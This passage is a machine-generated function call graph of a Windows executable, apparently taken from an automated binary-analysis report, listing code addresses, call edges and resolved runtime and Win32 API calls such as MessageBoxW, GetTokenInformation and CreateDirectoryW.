7ff6b9f2eb9a 17667->17670 17667->17672 17669->17672 17673 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 17669->17673 17671 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 17670->17671 17671->17672 17672->17570 17673->17672 17675 7ff6b9f20c27 17674->17675 17676 7ff6b9f20c16 17674->17676 17675->17676 17677 7ff6b9f2d66c _fread_nolock 12 API calls 17675->17677 17682 7ff6b9f2e5e0 17676->17682 17678 7ff6b9f20c54 17677->17678 17679 7ff6b9f20c68 17678->17679 17680 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17678->17680 17681 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17679->17681 17680->17679 17681->17676 17683 7ff6b9f2e5fd 17682->17683 17684 7ff6b9f2e630 17682->17684 17685 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17683->17685 17684->17683 17687 7ff6b9f2e662 17684->17687 17686 7ff6b9f24311 17685->17686 17686->17617 17686->17620 17691 7ff6b9f2e775 17687->17691 17697 7ff6b9f2e6aa 17687->17697 17688 7ff6b9f2e867 17728 7ff6b9f2dacc 17688->17728 17690 7ff6b9f2e82d 17721 7ff6b9f2de64 17690->17721 17691->17688 17691->17690 17692 7ff6b9f2e7fc 17691->17692 17694 7ff6b9f2e7bf 17691->17694 17696 7ff6b9f2e7b5 17691->17696 17714 7ff6b9f2e144 17692->17714 17704 7ff6b9f2e374 17694->17704 17696->17690 17699 7ff6b9f2e7ba 17696->17699 17697->17686 17700 7ff6b9f2a514 __std_exception_copy 37 API calls 17697->17700 17699->17692 17699->17694 17701 7ff6b9f2e762 17700->17701 17701->17686 17702 7ff6b9f2a970 _isindst 17 API calls 17701->17702 17703 7ff6b9f2e8c4 17702->17703 17737 7ff6b9f3411c 17704->17737 17708 7ff6b9f2e41c 17709 7ff6b9f2e471 17708->17709 17711 7ff6b9f2e43c 17708->17711 17713 7ff6b9f2e420 17708->17713 17790 7ff6b9f2df60 17709->17790 17786 7ff6b9f2e21c 17711->17786 17713->17686 17715 7ff6b9f3411c 38 API calls 17714->17715 17716 7ff6b9f2e18e 17715->17716 17717 7ff6b9f33b64 37 API calls 17716->17717 17718 7ff6b9f2e1de 17717->17718 17719 7ff6b9f2e1e2 17718->17719 17720 7ff6b9f2e21c 45 API calls 17718->17720 17719->17686 17720->17719 17722 7ff6b9f3411c 38 API calls 17721->17722 17723 7ff6b9f2deaf 17722->17723 17724 7ff6b9f33b64 37 API calls 17723->17724 17725 7ff6b9f2df07 17724->17725 17726 7ff6b9f2df0b 17725->17726 17727 7ff6b9f2df60 45 API calls 17725->17727 17726->17686 17727->17726 17729 7ff6b9f2db11 17728->17729 17730 7ff6b9f2db44 17728->17730 17731 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17729->17731 17732 7ff6b9f2db5c 17730->17732 17734 7ff6b9f2dbdd 17730->17734 17736 7ff6b9f2db3d __scrt_get_show_window_mode 17731->17736 17733 7ff6b9f2de64 46 API calls 17732->17733 17733->17736 17735 7ff6b9f24830 45 API calls 17734->17735 17734->17736 17735->17736 17736->17686 17738 7ff6b9f3416f fegetenv 17737->17738 17739 7ff6b9f37e9c 37 API calls 17738->17739 17744 7ff6b9f341c2 17739->17744 17740 7ff6b9f341ef 17743 7ff6b9f2a514 __std_exception_copy 37 API calls 17740->17743 17741 7ff6b9f342b2 17742 7ff6b9f37e9c 37 API calls 17741->17742 17745 7ff6b9f342dc 17742->17745 17746 7ff6b9f3426d 17743->17746 17744->17741 17747 7ff6b9f341dd 17744->17747 17748 7ff6b9f3428c 17744->17748 17749 7ff6b9f37e9c 37 API calls 17745->17749 17750 7ff6b9f35394 17746->17750 17756 7ff6b9f34275 17746->17756 17747->17740 17747->17741 17751 7ff6b9f2a514 __std_exception_copy 37 API calls 17748->17751 17752 7ff6b9f342ed 17749->17752 17753 7ff6b9f2a970 _isindst 17 API calls 17750->17753 17751->17746 17754 7ff6b9f38090 20 API calls 17752->17754 17755 7ff6b9f353a9 17753->17755 17764 7ff6b9f34356 __scrt_get_show_window_mode 17754->17764 17757 7ff6b9f1c5c0 _log10_special 8 API calls 17756->17757 17758 7ff6b9f2e3c1 17757->17758 17782 7ff6b9f33b64 17758->17782 17759 7ff6b9f346ff __scrt_get_show_window_mode 17760 7ff6b9f34397 memcpy_s 17775 7ff6b9f34cdb memcpy_s __scrt_get_show_window_mode 17760->17775 17778 7ff6b9f347f3 memcpy_s __scrt_get_show_window_mode 17760->17778 17761 7ff6b9f34a3f 17762 7ff6b9f33c80 37 API calls 17761->17762 17766 7ff6b9f35157 17762->17766 17763 7ff6b9f349eb 17763->17761 17763->17763 17765 7ff6b9f353ac memcpy_s 37 API calls 17763->17765 17764->17759 17764->17760 17767 7ff6b9f24f78 _get_daylight 11 API calls 17764->17767 17765->17761 17766->17766 17771 7ff6b9f353ac memcpy_s 37 API calls 17766->17771 17781 7ff6b9f351b2 17766->17781 17768 7ff6b9f347d0 17767->17768 17770 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 17768->17770 17769 7ff6b9f35338 17774 7ff6b9f37e9c 37 API calls 17769->17774 17770->17760 17771->17781 17772 7ff6b9f24f78 11 API calls _get_daylight 17772->17775 17773 7ff6b9f24f78 11 API calls _get_daylight 17773->17778 17774->17756 17775->17761 17775->17763 17775->17772 17777 7ff6b9f2a950 37 API calls _invalid_parameter_noinfo 17775->17777 17776 7ff6b9f33c80 37 API calls 17776->17781 17777->17775 17778->17763 17778->17773 17779 7ff6b9f2a950 37 API calls _invalid_parameter_noinfo 17778->17779 17779->17778 17780 7ff6b9f353ac memcpy_s 37 API calls 17780->17781 17781->17769 17781->17776 17781->17780 17783 7ff6b9f33b83 17782->17783 17784 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17783->17784 17785 7ff6b9f33bae memcpy_s 17783->17785 17784->17785 17785->17708 17787 7ff6b9f2e248 memcpy_s 17786->17787 17788 7ff6b9f24830 45 API calls 17787->17788 17789 7ff6b9f2e302 memcpy_s __scrt_get_show_window_mode 17787->17789 17788->17789 17789->17713 17791 7ff6b9f2df9b 17790->17791 17796 7ff6b9f2dfe8 memcpy_s 17790->17796 17792 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17791->17792 17793 7ff6b9f2dfc7 17792->17793 17793->17713 17794 7ff6b9f2e053 17795 7ff6b9f2a514 __std_exception_copy 37 API calls 17794->17795 17797 7ff6b9f2e095 memcpy_s 17795->17797 17796->17794 17798 7ff6b9f24830 45 API calls 17796->17798 17799 7ff6b9f2a970 _isindst 17 API calls 17797->17799 17798->17794 17800 7ff6b9f2e140 17799->17800 17802 7ff6b9f20ccf 17801->17802 17803 7ff6b9f20cbe 17801->17803 17802->17803 17804 7ff6b9f2d66c _fread_nolock 12 API calls 17802->17804 17803->17637 17805 7ff6b9f20d00 17804->17805 17806 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17805->17806 17808 7ff6b9f20d14 17805->17808 17806->17808 17807 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17807->17803 17808->17807 17810 7ff6b9f247d6 17809->17810 17811 7ff6b9f247de 17809->17811 17812 7ff6b9f24830 45 API calls 17810->17812 17811->17648 17812->17811 17814 7ff6b9f2486f 17813->17814 17815 7ff6b9f2da41 17813->17815 17817 7ff6b9f2da94 17814->17817 17815->17814 17816 7ff6b9f33374 45 API calls 17815->17816 17816->17814 17818 7ff6b9f2daad 17817->17818 17819 7ff6b9f2487f 17817->17819 17818->17819 17820 7ff6b9f326c0 45 API calls 17818->17820 17819->17570 17820->17819 17824 7ff6b9f36df8 17821->17824 17827 7ff6b9f36e5c 17824->17827 17825 7ff6b9f1c5c0 _log10_special 8 API calls 17826 7ff6b9f3012d 17825->17826 17826->17672 17827->17825 17829 7ff6b9f2106d 17828->17829 17830 7ff6b9f2107f 17828->17830 17831 7ff6b9f24f78 _get_daylight 11 API calls 17829->17831 17832 7ff6b9f2108d 17830->17832 17837 7ff6b9f210c9 17830->17837 17833 7ff6b9f21072 17831->17833 17835 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17832->17835 17834 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 17833->17834 17841 7ff6b9f2107d 17834->17841 17835->17841 17836 7ff6b9f21445 17839 7ff6b9f24f78 _get_daylight 11 API calls 17836->17839 17836->17841 17837->17836 17838 7ff6b9f24f78 _get_daylight 11 API calls 17837->17838 17840 7ff6b9f2143a 17838->17840 17842 7ff6b9f216d9 17839->17842 17844 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 17840->17844 17841->17534 17843 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 17842->17843 17843->17841 17844->17836 17846 7ff6b9f20774 17845->17846 17873 7ff6b9f204d4 17846->17873 17848 7ff6b9f2078d 17848->17188 17885 7ff6b9f2042c 17849->17885 17853 7ff6b9f1c8c0 17852->17853 17854 7ff6b9f12930 GetCurrentProcessId 17853->17854 17855 7ff6b9f11c80 49 API calls 17854->17855 17856 7ff6b9f12979 17855->17856 17899 7ff6b9f249f4 17856->17899 17861 7ff6b9f11c80 49 API calls 17862 7ff6b9f129ff 17861->17862 17929 7ff6b9f12620 17862->17929 17865 7ff6b9f1c5c0 _log10_special 8 API calls 17866 7ff6b9f12a31 17865->17866 17866->17227 17868 7ff6b9f20189 17867->17868 17869 7ff6b9f11b89 17867->17869 17870 7ff6b9f24f78 _get_daylight 11 API calls 17868->17870 17869->17226 17869->17227 17871 7ff6b9f2018e 17870->17871 17872 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 17871->17872 17872->17869 17874 7ff6b9f2053e 17873->17874 17875 7ff6b9f204fe 17873->17875 17874->17875 17877 7ff6b9f2054a 17874->17877 17876 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17875->17876 17883 7ff6b9f20525 17876->17883 17884 7ff6b9f254dc EnterCriticalSection 17877->17884 17883->17848 17886 7ff6b9f20456 17885->17886 17897 7ff6b9f11a20 17885->17897 17887 7ff6b9f204a2 17886->17887 17891 7ff6b9f20465 __scrt_get_show_window_mode 17886->17891 17886->17897 17898 7ff6b9f254dc EnterCriticalSection 17887->17898 17889 7ff6b9f24f78 _get_daylight 11 API calls 17892 7ff6b9f2047a 17889->17892 17891->17889 17894 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 17892->17894 17894->17897 17897->17195 17897->17196 17901 7ff6b9f24a4e 17899->17901 17900 7ff6b9f24a73 17903 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17900->17903 17901->17900 17902 7ff6b9f24aaf 17901->17902 17938 7ff6b9f22c80 17902->17938 17905 7ff6b9f24a9d 17903->17905 17907 7ff6b9f1c5c0 _log10_special 8 API calls 17905->17907 17906 7ff6b9f24b58 17912 7ff6b9f24b8c 17906->17912 17915 7ff6b9f24b61 17906->17915 17910 7ff6b9f129c3 17907->17910 17908 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17908->17905 17917 7ff6b9f251d0 17910->17917 17911 7ff6b9f24bb0 17911->17912 17913 7ff6b9f24bba 17911->17913 17912->17908 17916 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17913->17916 17914 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17914->17905 17915->17914 17916->17905 17918 7ff6b9f2b338 _get_daylight 11 API calls 17917->17918 17919 7ff6b9f251e7 17918->17919 17920 7ff6b9f129e5 17919->17920 17921 7ff6b9f2ec08 _get_daylight 11 API calls 17919->17921 17924 7ff6b9f25227 17919->17924 17920->17861 17922 7ff6b9f2521c 17921->17922 17923 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17922->17923 17923->17924 17924->17920 18073 7ff6b9f2ec90 17924->18073 17927 7ff6b9f2a970 _isindst 17 API calls 17928 7ff6b9f2526c 17927->17928 17930 7ff6b9f1262f 17929->17930 17931 7ff6b9f19400 2 API calls 17930->17931 17932 7ff6b9f12660 17931->17932 17933 7ff6b9f1266f MessageBoxW 17932->17933 17934 7ff6b9f12683 MessageBoxA 17932->17934 17935 7ff6b9f12690 17933->17935 17934->17935 17936 7ff6b9f1c5c0 _log10_special 8 API calls 17935->17936 17937 7ff6b9f126a0 17936->17937 17937->17865 17939 7ff6b9f22cbe 17938->17939 17940 7ff6b9f22cae 17938->17940 17941 7ff6b9f22cc7 17939->17941 17942 7ff6b9f22cf5 17939->17942 17945 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17940->17945 17943 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17941->17943 17942->17940 17944 7ff6b9f22ced 17942->17944 17946 7ff6b9f24830 45 API calls 17942->17946 17948 7ff6b9f22fa4 17942->17948 17952 7ff6b9f23610 17942->17952 17978 7ff6b9f232d8 17942->17978 18008 7ff6b9f22b60 17942->18008 17943->17944 17944->17906 17944->17911 17944->17912 17944->17915 17945->17944 17946->17942 17950 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17948->17950 17950->17940 17953 7ff6b9f23652 17952->17953 17954 7ff6b9f236c5 17952->17954 17955 7ff6b9f23658 17953->17955 17956 7ff6b9f236ef 17953->17956 17957 7ff6b9f236ca 17954->17957 17958 7ff6b9f2371f 17954->17958 17965 7ff6b9f2365d 17955->17965 17969 7ff6b9f2372e 17955->17969 18025 7ff6b9f21bc0 17956->18025 17959 7ff6b9f236cc 17957->17959 17960 7ff6b9f236ff 17957->17960 17958->17956 17958->17969 17976 7ff6b9f23688 17958->17976 17962 7ff6b9f2366d 17959->17962 17968 7ff6b9f236db 17959->17968 18032 7ff6b9f217b0 17960->18032 17977 7ff6b9f2375d 17962->17977 18011 7ff6b9f23f74 17962->18011 17965->17962 17967 7ff6b9f236a0 17965->17967 17965->17976 17967->17977 18021 7ff6b9f24430 17967->18021 17968->17956 17971 7ff6b9f236e0 17968->17971 17969->17977 18039 7ff6b9f21fd0 17969->18039 17973 7ff6b9f245c8 37 API calls 17971->17973 17971->17977 17972 7ff6b9f1c5c0 _log10_special 8 API calls 17974 7ff6b9f239f3 17972->17974 17973->17976 17974->17942 17976->17977 18046 7ff6b9f2e8c8 17976->18046 17977->17972 17979 7ff6b9f232f9 17978->17979 17980 7ff6b9f232e3 17978->17980 17983 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 17979->17983 17984 7ff6b9f23337 17979->17984 17981 7ff6b9f23652 17980->17981 17982 7ff6b9f236c5 17980->17982 17980->17984 17985 7ff6b9f23658 17981->17985 17986 7ff6b9f236ef 17981->17986 17987 7ff6b9f236ca 17982->17987 17988 7ff6b9f2371f 17982->17988 17983->17984 17984->17942 17995 7ff6b9f2365d 17985->17995 17999 7ff6b9f2372e 17985->17999 17991 7ff6b9f21bc0 38 API calls 17986->17991 17989 7ff6b9f236cc 17987->17989 17990 7ff6b9f236ff 17987->17990 17988->17986 17988->17999 18006 7ff6b9f23688 17988->18006 17992 7ff6b9f2366d 17989->17992 17997 7ff6b9f236db 17989->17997 17993 7ff6b9f217b0 38 API calls 17990->17993 17991->18006 17994 7ff6b9f23f74 47 API calls 17992->17994 18007 7ff6b9f2375d 17992->18007 17993->18006 17994->18006 17995->17992 17998 7ff6b9f236a0 17995->17998 17995->18006 17996 7ff6b9f21fd0 38 API calls 17996->18006 17997->17986 18001 7ff6b9f236e0 17997->18001 18000 7ff6b9f24430 47 API calls 17998->18000 17998->18007 17999->17996 17999->18007 18000->18006 18003 7ff6b9f245c8 37 API calls 18001->18003 18001->18007 18002 7ff6b9f1c5c0 _log10_special 8 API calls 18004 7ff6b9f239f3 18002->18004 18003->18006 18004->17942 18005 7ff6b9f2e8c8 47 API calls 18005->18006 18006->18005 18006->18007 18007->18002 18056 7ff6b9f20d84 18008->18056 18012 7ff6b9f23f96 18011->18012 18013 7ff6b9f20bf0 12 API calls 18012->18013 18014 7ff6b9f23fde 18013->18014 18015 7ff6b9f2e5e0 46 API calls 18014->18015 18016 7ff6b9f240b1 18015->18016 18017 7ff6b9f24830 45 API calls 18016->18017 18020 7ff6b9f240d3 18016->18020 18017->18020 18018 7ff6b9f2415c 18018->17976 18018->18018 18019 7ff6b9f24830 45 API calls 18019->18018 18020->18018 18020->18019 18020->18020 18022 7ff6b9f24448 18021->18022 18024 7ff6b9f244b0 18021->18024 18023 7ff6b9f2e8c8 47 API calls 18022->18023 18022->18024 18023->18024 18024->17976 18027 7ff6b9f21bf3 18025->18027 18026 7ff6b9f21c22 18028 7ff6b9f20bf0 12 API calls 18026->18028 18031 7ff6b9f21c5f 18026->18031 18027->18026 18029 7ff6b9f21cdf 18027->18029 18028->18031 18030 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18029->18030 18030->18031 18031->17976 18034 7ff6b9f217e3 18032->18034 18033 7ff6b9f21812 18035 7ff6b9f20bf0 12 API calls 18033->18035 18038 7ff6b9f2184f 18033->18038 18034->18033 18036 7ff6b9f218cf 18034->18036 18035->18038 18037 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18036->18037 18037->18038 18038->17976 18040 7ff6b9f22003 18039->18040 18041 7ff6b9f22032 18040->18041 18043 7ff6b9f220ef 18040->18043 18042 7ff6b9f20bf0 12 API calls 18041->18042 18045 7ff6b9f2206f 18041->18045 18042->18045 18044 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18043->18044 18044->18045 18045->17976 18047 7ff6b9f2e8f0 18046->18047 18048 7ff6b9f2e935 18047->18048 18050 7ff6b9f24830 45 API calls 18047->18050 18052 7ff6b9f2e8f5 __scrt_get_show_window_mode 18047->18052 18054 7ff6b9f2e91e __scrt_get_show_window_mode 18047->18054 18051 7ff6b9f30858 WideCharToMultiByte 18048->18051 18048->18052 18048->18054 18049 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18049->18052 18050->18048 18053 7ff6b9f2ea11 18051->18053 18052->17976 18053->18052 18055 7ff6b9f2ea26 GetLastError 18053->18055 18054->18049 18054->18052 18055->18052 18055->18054 18057 7ff6b9f20db1 18056->18057 18058 7ff6b9f20dc3 18056->18058 18059 7ff6b9f24f78 _get_daylight 11 API calls 18057->18059 18060 7ff6b9f20dd0 18058->18060 18064 7ff6b9f20e0d 18058->18064 18061 7ff6b9f20db6 18059->18061 18062 7ff6b9f2a884 _invalid_parameter_noinfo 37 API calls 18060->18062 18063 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18061->18063 18070 7ff6b9f20dc1 18062->18070 18063->18070 18065 7ff6b9f20eb6 18064->18065 18066 7ff6b9f24f78 _get_daylight 11 API calls 18064->18066 18067 7ff6b9f24f78 _get_daylight 11 API calls 18065->18067 18065->18070 18068 7ff6b9f20eab 18066->18068 18069 7ff6b9f20f60 18067->18069 18071 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18068->18071 18072 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18069->18072 18070->17942 18071->18065 18072->18070 18078 7ff6b9f2ecad 18073->18078 18074 7ff6b9f2ecb2 18075 7ff6b9f2524d 18074->18075 18076 7ff6b9f24f78 _get_daylight 11 API calls 18074->18076 18075->17920 18075->17927 18077 7ff6b9f2ecbc 18076->18077 18079 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18077->18079 18078->18074 18078->18075 18080 7ff6b9f2ecfc 18078->18080 18079->18075 18080->18075 18081 7ff6b9f24f78 _get_daylight 11 API calls 18080->18081 18081->18077 18083 7ff6b9f282c8 18082->18083 18084 7ff6b9f282b5 18082->18084 18092 7ff6b9f27f2c 18083->18092 18086 7ff6b9f24f78 _get_daylight 11 API calls 18084->18086 18088 7ff6b9f282ba 18086->18088 18089 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18088->18089 18091 7ff6b9f282c6 18089->18091 18091->17247 18099 7ff6b9f30348 EnterCriticalSection 18092->18099 18101 7ff6b9f187a1 GetTokenInformation 18100->18101 18102 7ff6b9f18823 __std_exception_copy 18100->18102 18103 7ff6b9f187cd 18101->18103 18104 7ff6b9f187c2 GetLastError 18101->18104 18105 7ff6b9f18836 CloseHandle 18102->18105 18106 7ff6b9f1883c 18102->18106 18103->18102 18107 7ff6b9f187e9 GetTokenInformation 18103->18107 18104->18102 18104->18103 18105->18106 18106->17252 18107->18102 18108 7ff6b9f1880c 18107->18108 18108->18102 18109 7ff6b9f18816 ConvertSidToStringSidW 18108->18109 18109->18102 18111 7ff6b9f1c8c0 18110->18111 18112 7ff6b9f12b74 GetCurrentProcessId 18111->18112 18113 7ff6b9f126b0 48 API calls 18112->18113 18114 7ff6b9f12bc7 18113->18114 18115 7ff6b9f24c48 48 API calls 18114->18115 18116 7ff6b9f12c10 MessageBoxW 18115->18116 18117 7ff6b9f1c5c0 _log10_special 8 API calls 18116->18117 18118 7ff6b9f12c40 18117->18118 18118->17263 18120 7ff6b9f125e5 18119->18120 18121 7ff6b9f24c48 48 API calls 18120->18121 18122 7ff6b9f12604 18121->18122 18122->17278 18158 7ff6b9f28804 18123->18158 18127 7ff6b9f181cc 18126->18127 18128 7ff6b9f19400 2 API calls 18127->18128 18129 7ff6b9f181eb 18128->18129 18130 7ff6b9f18206 ExpandEnvironmentStringsW 18129->18130 18131 7ff6b9f181f3 18129->18131 18133 7ff6b9f1822c __std_exception_copy 18130->18133 18132 7ff6b9f12810 49 API calls 18131->18132 18134 7ff6b9f181ff __std_exception_copy 18132->18134 18135 7ff6b9f18230 18133->18135 18137 7ff6b9f18243 18133->18137 18138 7ff6b9f1c5c0 _log10_special 8 API calls 18134->18138 18136 7ff6b9f12810 49 API calls 18135->18136 18136->18134 18140 7ff6b9f182af 18137->18140 18141 7ff6b9f18251 GetDriveTypeW 18137->18141 18139 7ff6b9f1839f 18138->18139 18139->17276 18139->17279 18142 7ff6b9f27e78 45 API calls 18140->18142 18145 7ff6b9f182a0 18141->18145 18146 7ff6b9f18285 18141->18146 18144 7ff6b9f182c1 18142->18144 18148 7ff6b9f182c9 18144->18148 18152 7ff6b9f182dc 18144->18152 18281 7ff6b9f279dc 18145->18281 18149 7ff6b9f12810 49 API calls 18146->18149 18149->18134 18199 7ff6b9f315c8 18158->18199 18258 7ff6b9f31340 18199->18258 18279 7ff6b9f30348 EnterCriticalSection 18258->18279 18282 7ff6b9f279fa 18281->18282 18285 7ff6b9f27a2d 18281->18285 18282->18285 18285->18134 18298 7ff6b9f1455a 18297->18298 18299 7ff6b9f19400 2 API calls 18298->18299 18300 7ff6b9f1457f 18299->18300 18301 7ff6b9f1c5c0 _log10_special 8 API calls 18300->18301 18302 7ff6b9f145a7 18301->18302 18302->17315 18305 7ff6b9f17e1e 18303->18305 18304 7ff6b9f17f42 18307 7ff6b9f1c5c0 _log10_special 8 API calls 18304->18307 18305->18304 18306 7ff6b9f11c80 49 API calls 18305->18306 18310 7ff6b9f17ea5 18306->18310 18308 7ff6b9f17f73 18307->18308 18308->17315 18309 7ff6b9f11c80 49 API calls 18309->18310 18310->18304 18310->18309 18311 7ff6b9f14550 10 API calls 18310->18311 18312 7ff6b9f17efb 18310->18312 18311->18310 18313 7ff6b9f19400 2 API calls 18312->18313 18314 7ff6b9f17f13 CreateDirectoryW 18313->18314 18314->18304 18314->18310 18316 7ff6b9f11637 18315->18316 18317 7ff6b9f11613 18315->18317 18318 7ff6b9f145b0 108 API calls 18316->18318 18436 7ff6b9f11050 18317->18436 18321 7ff6b9f1164b 18318->18321 18320 7ff6b9f11618 18322 7ff6b9f1162e 18320->18322 18325 7ff6b9f12710 54 API calls 18320->18325 18323 7ff6b9f11682 18321->18323 18324 7ff6b9f11653 18321->18324 18322->17315 18327 7ff6b9f145b0 108 API calls 18323->18327 18326 7ff6b9f24f78 _get_daylight 11 API calls 18324->18326 18325->18322 18328 7ff6b9f11658 18326->18328 18329 7ff6b9f11696 18327->18329 18330 7ff6b9f12910 54 API calls 18328->18330 18331 7ff6b9f116b8 18329->18331 18332 7ff6b9f1169e 18329->18332 18335 7ff6b9f11671 18330->18335 18334 7ff6b9f20744 73 API calls 18331->18334 18333 7ff6b9f12710 54 API calls 18332->18333 18336 7ff6b9f116ae 18333->18336 18337 7ff6b9f116cd 18334->18337 18335->17315 18340 7ff6b9f200bc 74 API calls 18336->18340 18338 7ff6b9f116f9 18337->18338 18339 7ff6b9f116d1 18337->18339 18342 7ff6b9f11717 18338->18342 18343 7ff6b9f116ff 18338->18343 18341 7ff6b9f24f78 _get_daylight 11 API calls 18339->18341 18344 7ff6b9f11829 18340->18344 18345 7ff6b9f116d6 18341->18345 18348 7ff6b9f11739 18342->18348 18355 7ff6b9f11761 18342->18355 18414 7ff6b9f11210 18343->18414 18344->17315 18347 7ff6b9f12910 54 API calls 18345->18347 18354 7ff6b9f116ef __std_exception_copy 18347->18354 18349 7ff6b9f24f78 _get_daylight 11 API calls 18348->18349 18353 7ff6b9f2040c _fread_nolock 53 API calls 18353->18355 18355->18353 18355->18354 18356 7ff6b9f117da 18355->18356 18360 7ff6b9f117c5 18355->18360 18467 7ff6b9f20b4c 18355->18467 18364 7ff6b9f1717b 18363->18364 18366 7ff6b9f17134 18363->18366 18364->17315 18366->18364 18500 7ff6b9f25094 18366->18500 18368 7ff6b9f14191 18367->18368 18369 7ff6b9f144d0 49 API calls 18368->18369 18370 7ff6b9f141cb 18369->18370 18371 7ff6b9f144d0 49 API calls 18370->18371 18372 7ff6b9f141db 18371->18372 18373 7ff6b9f1422c 18372->18373 18374 7ff6b9f141fd 18372->18374 18376 7ff6b9f14100 51 API calls 18373->18376 18515 7ff6b9f14100 18374->18515 18377 7ff6b9f1422a 18376->18377 18378 7ff6b9f14257 18377->18378 18379 7ff6b9f1428c 18377->18379 18522 7ff6b9f17ce0 18378->18522 18381 7ff6b9f14100 51 API calls 18379->18381 18383 7ff6b9f142b0 18381->18383 18386 7ff6b9f14100 51 API calls 18383->18386 18391 7ff6b9f14302 18383->18391 18384 7ff6b9f14383 18390 7ff6b9f11950 115 API calls 18384->18390 18389 7ff6b9f142d9 18386->18389 18389->18391 18396 7ff6b9f14100 51 API calls 18389->18396 18391->18384 18397 7ff6b9f1437c 18391->18397 18399 7ff6b9f14307 18391->18399 18402 7ff6b9f1436b 18391->18402 18396->18391 18397->18399 18412 7ff6b9f11c80 49 API calls 18411->18412 18413 7ff6b9f14464 18412->18413 18413->17315 18415 7ff6b9f11268 18414->18415 18437 7ff6b9f145b0 108 API calls 18436->18437 18438 7ff6b9f1108c 18437->18438 18439 7ff6b9f110a9 18438->18439 18440 7ff6b9f11094 18438->18440 18442 7ff6b9f20744 73 API calls 18439->18442 18441 7ff6b9f12710 54 API calls 18440->18441 18448 7ff6b9f110a4 __std_exception_copy 18441->18448 18443 7ff6b9f110bf 18442->18443 18444 7ff6b9f110e6 18443->18444 18445 7ff6b9f110c3 18443->18445 18449 7ff6b9f110f7 18444->18449 18450 7ff6b9f11122 18444->18450 18446 7ff6b9f24f78 _get_daylight 11 API calls 18445->18446 18447 7ff6b9f110c8 18446->18447 18451 7ff6b9f12910 54 API calls 18447->18451 18448->18320 18452 7ff6b9f24f78 _get_daylight 11 API calls 18449->18452 18453 7ff6b9f11129 18450->18453 18461 7ff6b9f1113c 18450->18461 18458 7ff6b9f110e1 __std_exception_copy 18451->18458 18454 7ff6b9f11100 18452->18454 18455 7ff6b9f11210 92 API calls 18453->18455 18456 7ff6b9f12910 54 API calls 18454->18456 18455->18458 18456->18458 18457 7ff6b9f200bc 74 API calls 18459 7ff6b9f111b4 18457->18459 18458->18457 18459->18448 18460 7ff6b9f2040c _fread_nolock 53 API calls 18460->18461 18461->18458 18461->18460 18463 7ff6b9f111ed 18461->18463 18464 7ff6b9f24f78 _get_daylight 11 API calls 18463->18464 18465 7ff6b9f111f2 18464->18465 18501 7ff6b9f250ce 18500->18501 18502 7ff6b9f250a1 18500->18502 18504 7ff6b9f250f1 18501->18504 18505 7ff6b9f2510d 18501->18505 18503 7ff6b9f24f78 _get_daylight 11 API calls 18502->18503 18513 7ff6b9f25058 18502->18513 18506 7ff6b9f250ab 18503->18506 18507 7ff6b9f24f78 _get_daylight 11 API calls 18504->18507 18508 7ff6b9f24fbc 45 API calls 18505->18508 18509 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18506->18509 18510 7ff6b9f250f6 18507->18510 18511 7ff6b9f25101 18508->18511 18512 7ff6b9f250b6 18509->18512 18514 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18510->18514 18511->18366 18512->18366 18513->18366 18514->18511 18516 7ff6b9f14126 18515->18516 18517 7ff6b9f249f4 49 API calls 18516->18517 18518 7ff6b9f1414c 18517->18518 18519 7ff6b9f1415d 18518->18519 18520 7ff6b9f14550 10 API calls 18518->18520 18519->18377 18521 7ff6b9f1416f 18520->18521 18521->18377 18523 7ff6b9f17cf5 18522->18523 18524 7ff6b9f145b0 108 API calls 18523->18524 18525 7ff6b9f17d1b 18524->18525 18579 7ff6b9f25f38 18578->18579 18580 7ff6b9f25f5e 18579->18580 18583 7ff6b9f25f91 18579->18583 18581 7ff6b9f24f78 _get_daylight 11 API calls 18580->18581 18582 7ff6b9f25f63 18581->18582 18584 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 18582->18584 18585 7ff6b9f25f97 18583->18585 18586 7ff6b9f25fa4 18583->18586 18590 7ff6b9f14606 18584->18590 18588 7ff6b9f24f78 _get_daylight 11 API calls 18585->18588 18597 7ff6b9f2ac98 18586->18597 18588->18590 18590->17340 18610 7ff6b9f30348 EnterCriticalSection 18597->18610 18970 7ff6b9f27968 18969->18970 18973 7ff6b9f27444 